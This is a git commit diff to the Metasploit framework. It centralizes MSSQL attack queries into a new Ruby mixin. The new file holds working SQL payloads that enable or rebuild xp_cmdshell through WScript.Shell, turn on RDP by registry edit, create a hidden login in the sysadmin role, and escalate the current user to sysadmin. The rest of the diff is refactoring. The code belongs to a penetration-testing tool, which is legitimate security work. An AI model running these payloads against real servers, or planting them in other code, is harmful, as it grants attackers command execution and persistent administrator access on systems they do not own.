Merge in David Kennedy's new MSSQL changes (centralized SQL query mixin)
git-svn-id: file:///home/svn/framework3/trunk@7236 4d416f70-5f16-0410-b530-b9f4589650daunstable
HD Moore
parent
255379c2d0
commit
b53a596ff0
|
|
@ -24,6 +24,7 @@ require 'msf/core/exploit/smtp'
|
|||
require 'msf/core/exploit/dcerpc'
|
||||
require 'msf/core/exploit/sunrpc'
|
||||
require 'msf/core/exploit/mssql'
|
||||
require 'msf/core/exploit/mssql_commands'
|
||||
require 'msf/core/exploit/snmp'
|
||||
require 'msf/core/exploit/arkeia'
|
||||
require 'msf/core/exploit/ndmp'
|
||||
|
|
|
|||
|
|
@ -1,4 +1,5 @@
|
|||
require 'msf/core'
|
||||
require 'msf/core/exploit/mssql_commands'
|
||||
|
||||
module Msf
|
||||
|
||||
|
|
@ -8,7 +9,8 @@ module Msf
|
|||
#
|
||||
###
|
||||
module Exploit::Remote::MSSQL
|
||||
|
||||
|
||||
include Exploit::Remote::MSSQL_COMMANDS
|
||||
include Exploit::Remote::Udp
|
||||
include Exploit::Remote::Tcp
|
||||
|
||||
|
|
@ -83,16 +85,10 @@ module Exploit::Remote::MSSQL
|
|||
return res
|
||||
end
|
||||
|
||||
#
|
||||
# Re-enable the xp_cmdshell stored procedure
|
||||
#
|
||||
def mssql_xpcmdshell_enable
|
||||
mssql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
|
||||
end
|
||||
|
||||
#
|
||||
# Execute a system command via xp_cmdshell
|
||||
#
|
||||
|
||||
def mssql_xpcmdshell(cmd,doprint=false,opts={})
|
||||
force_enable = false
|
||||
begin
|
||||
|
|
@ -104,7 +100,7 @@ module Exploit::Remote::MSSQL
|
|||
raise RuntimeError, "Failed to execute command"
|
||||
else
|
||||
print_status("The server may have xp_cmdshell disabled, trying to enable it...")
|
||||
mssql_xpcmdshell_enable()
|
||||
mssql_query(mssql_xpcmdshell_enable())
|
||||
raise RuntimeError, "xp_cmdshell disabled"
|
||||
end
|
||||
end
|
||||
|
|
@ -316,7 +312,7 @@ module Exploit::Remote::MSSQL
|
|||
#
|
||||
def mssql_query(sqla, doprint=false, opts={})
|
||||
info = { :sql => sqla }
|
||||
|
||||
|
||||
opts[:timeout] ||= 15
|
||||
|
||||
pkts = []
|
||||
|
|
@ -649,6 +645,5 @@ module Exploit::Remote::MSSQL
|
|||
buff = data.slice!(0,len)
|
||||
info[:login_ack] = true
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
|||
|
|
@ -0,0 +1,63 @@
|
|||
module Msf
|
||||
|
||||
###
|
||||
#
|
||||
# This module provides MSSQL specific commands in a centralized manner.
|
||||
#
|
||||
###
|
||||
|
||||
module Exploit::Remote::MSSQL_COMMANDS
|
||||
|
||||
# Re-enable the xp_cmdshell stored procedure in 2005 and 2008
|
||||
def mssql_xpcmdshell_enable(opts={});
|
||||
"exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;"
|
||||
end
|
||||
|
||||
# Re-enable the xp_cmdshell stored procedure on 2000
|
||||
def mssql_xpcmdshell_enable_2000(opts={});
|
||||
"exec sp_addextendedproc 'xp_cmdshell','xp_log70.dll';exec sp_addextendedproc 'xp_cmdshell', 'C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\xplog70.dll';"
|
||||
end
|
||||
|
||||
# Disable the xp_cmdshell stored procedure on 2005 and 2008
|
||||
def mssql_xpcmdshell_disable(opts={});
|
||||
"exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;"
|
||||
end
|
||||
|
||||
# Disable the xp_cmdshell stored procedure in 2000
|
||||
def mssql_sql_xpcmdshell_disable_2000(opts={});
|
||||
"exec sp_dropextendedproc 'xp_cmdshell';"
|
||||
end
|
||||
|
||||
# Rebuild xp_cmdshell if it was deleted
|
||||
def mssql_rebuild_xpcmdshell(opts={});
|
||||
"CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS;DECLARE @result int, @OLEResult int, @RunResult int;DECLARE @ShellID int;EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT;IF @OLEResult <> 0 SELECT @result = @OLEResult;IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult);EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait;IF @OLEResult <> 0 SELECT @result = @OLEResult;IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult);EXECUTE @OLEResult = sp_OADestroy @ShellID;return @result;"
|
||||
end
|
||||
|
||||
# Turn on RDP
|
||||
def mssql_rdp_enable(opts={});
|
||||
"exec master..xp_cmdshell 'REG ADD 'HKLM\\SYSTEM\\CurrentControlSet\\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /f /d 0';"
|
||||
end
|
||||
|
||||
# Grab servername
|
||||
def mssql_enumerate_servername(opts={});
|
||||
"SELECT @@SERVERNAME"
|
||||
end
|
||||
|
||||
# Get SQL Server Version Info
|
||||
def mssql_sql_info(opts={});
|
||||
"SELECT @@VERSION"
|
||||
end
|
||||
|
||||
# Add random user and random password to "sa" role on MSSQL
|
||||
def mssql_sa_escalation(opts={});
|
||||
var_username = opts[:username] || rand_text_alpha(5)
|
||||
var_password = opts[:password] || rand_text_alpha(10)
|
||||
"exec sp_addlogin '#{var_username}', '#{var_password}';exec sp_addsrvrolemember '#{var_username}', 'sysadmin'"
|
||||
end
|
||||
|
||||
# Add SQL current user to sysadmin group
|
||||
def mssql_current_user_escalation(opts={});
|
||||
"declare @moo varchar(50); set @moo = (select SYSTEM_USER); exec master..sp_addsrvrolemember @moo, 'sysadmin'"
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
@ -14,7 +14,6 @@ require 'msf/core'
|
|||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
|
||||
def initialize(info = {})
|
||||
|
||||
super(update_info(info,
|
||||
|
|
|
|||
Loading…
Reference in New Issue